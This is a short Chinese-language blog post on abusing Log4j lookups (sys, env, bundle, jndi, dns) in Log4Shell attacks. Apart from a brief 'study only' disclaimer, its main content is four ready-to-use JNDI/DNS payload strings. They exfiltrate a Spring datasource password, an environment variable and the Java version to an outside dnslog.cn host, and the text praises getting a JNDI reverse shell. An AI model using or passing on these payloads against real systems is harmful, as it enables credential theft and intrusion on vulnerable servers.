log4j其它几个lookup使用

/ 默认分类 / 0 条评论 / 9143 浏览

本站的所有程序和文章,仅限用于学习和研究目的;不得用于商业或者非法用途,否则,一切后果请用户自负!!

lookup类

可用的类如下

大佬们主要使用的有sys、env、bundle、jndi、dns

前面三个配合jndi和dns外带,能jndi反弹shell当然就是最香的了。

        LOGGER.error("${jndi:ldap://test.${bundle:application:spring.datasource.password}.j459j1.dnslog.cn/a}");
        LOGGER.error("${jndi:ldap://${env:os}.j459j1.dnslog.cn}");
        LOGGER.error("${jndi:ldap://1.${sys:java.version}.j459j1.dnslog.cn}");
        LOGGER.error("${jndi:dns://2.${sys:java.version}.j459j1.dnslog.cn}");

本文最后编辑时间为: 2021-12-11

如本文对你有帮助,点击广告支持一下吧,创造不易。

safe6